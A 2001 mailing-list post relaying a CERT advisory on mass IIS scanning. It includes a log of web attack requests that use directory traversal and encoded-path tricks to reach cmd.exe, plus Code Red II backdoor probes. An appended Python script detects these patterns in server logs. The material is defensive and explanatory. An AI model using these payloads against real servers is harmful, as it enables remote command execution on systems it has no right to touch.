[ale] CodeRed attacks, here we go again. OTHER ATTACKS

Jonathan Rickman jonathan at xcorps.net
Tue Sep 18 13:10:27 EDT 2001


On Tue, 18 Sep 2001, Ben Alexander wrote:

> You are probably seeing the same thing everyone else is, from all
> networks.  The attacks look for the Code Red 2 backdoor, attempt to exploit
> numerous other IIS vulnerabilities, try to execute TFTP to download a
> file called ADMIN.DLL, and a few others.

CERT advisory
=============
This morning (September 18th) the CERT/CC started receiving reports of a
massive increase in scanning directed at port 80 (HTTP). Reports indicate that
this scanning activity is attempting to exploit systems previously compromised
by Code Red II and/or the sadmind/IIS worm as well as other known
vulnerabilities in Microsoft Internet Information Server (IIS). Please see CERT
Vulnerability Note VU#111677 for information on the type of vulnerability being
exploited.

The following is a log excerpt of this scanning activity:

       GET /scripts/root.exe?/c+dir
       GET /MSADC/root.exe?/c+dir
       GET /c/winnt/system32/cmd.exe?/c+dir
       GET /d/winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
       GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
       GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
       GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

The CERT/CC has also received reports of a possibly new piece of malicious code
named "readme.exe" being sent via email. Preliminary analysis indicates that
this file may be related to the increase in port 80 scanning activity.

Sites are encouraged to verify the state of security patches on all IIS servers
and email client software. Administrators may also want to add filters to mail
servers to block the "readme.exe" attachment. In addition, sites may wish to
notify users of the existence of "readme.exe" and its potential threat.

=================

I just spoke with NIPC personnel. They will be releasing an advisory shortly. In
short...screen all attachments, patch all IIS boxen, and hunker down. This is
gonna get ugly.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net
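The probe URIs in the CERT excerpt above are easy to spot in a web server access log once the path encodings are unmasked. The script below is an added example, not part of the original post or of CERT's advisory; it normalises the overlong UTF-8 pairs and percent-encoding seen in the excerpt, then tags each request as a Code Red II backdoor check, a cmd.exe call, or a directory traversal. The log lines, IP addresses and the double-encoded %255c variant are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Common Log Format. Request paths follow the
# CERT excerpt; overlong UTF-8 bytes appear as \xNN text, as they do there.
# IPs are documentation placeholders, and the %255c line is a constructed
# double-encoded variant (%25 -> '%', then %5c -> '\').
SAMPLE_LOG = r"""
192.0.2.10 - - [18/Sep/2001:09:12:01 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0
192.0.2.10 - - [18/Sep/2001:09:12:01 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
192.0.2.10 - - [18/Sep/2001:09:12:02 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
192.0.2.10 - - [18/Sep/2001:09:12:02 -0400] "GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
198.51.100.7 - - [18/Sep/2001:09:13:44 -0400] "GET /index.html HTTP/1.0" 200 1420
""".strip().splitlines()

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

# Malformed/overlong UTF-8 pairs from the excerpt that IIS accepted as separators.
OVERLONG = {r"\xc0\xaf": "/", r"\xc0/": "/", r"\xc1\x9c": "\\", r"\xc1\x1c": "\\"}


def normalize_path(uri):
    """Collapse the encodings used by the probes into a plain forward-slash path."""
    path = uri.split("?", 1)[0]
    for seq, sep in OVERLONG.items():
        path = path.replace(seq, sep)
    for _ in range(2):  # two passes unmask double percent-encoding
        path = unquote(path)
    return path.replace("\\", "/").lower()


def classify(uri):
    """Return the probe signatures a request URI matches (empty list if benign)."""
    path = normalize_path(uri)
    tags = []
    if path.endswith("/root.exe"):
        tags.append("codered2-backdoor")  # cmd.exe copy left by Code Red II
    if path.endswith("/cmd.exe"):
        tags.append("cmd-exec")
    if "/../" in path:
        tags.append("traversal")
    return tags


def scan_log(lines):
    """Return (client_ip, uri, tags) for every request matching a signature."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and (tags := classify(m.group("uri"))):
            hits.append((line.split()[0], m.group("uri"), tags))
    return hits


if __name__ == "__main__":
    for ip, uri, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags), uri)
```

Real IIS logs carry the overlong sequences as raw bytes rather than \xNN text, so decode such a file as latin-1 and convert the bytes to that textual form before calling scan_log.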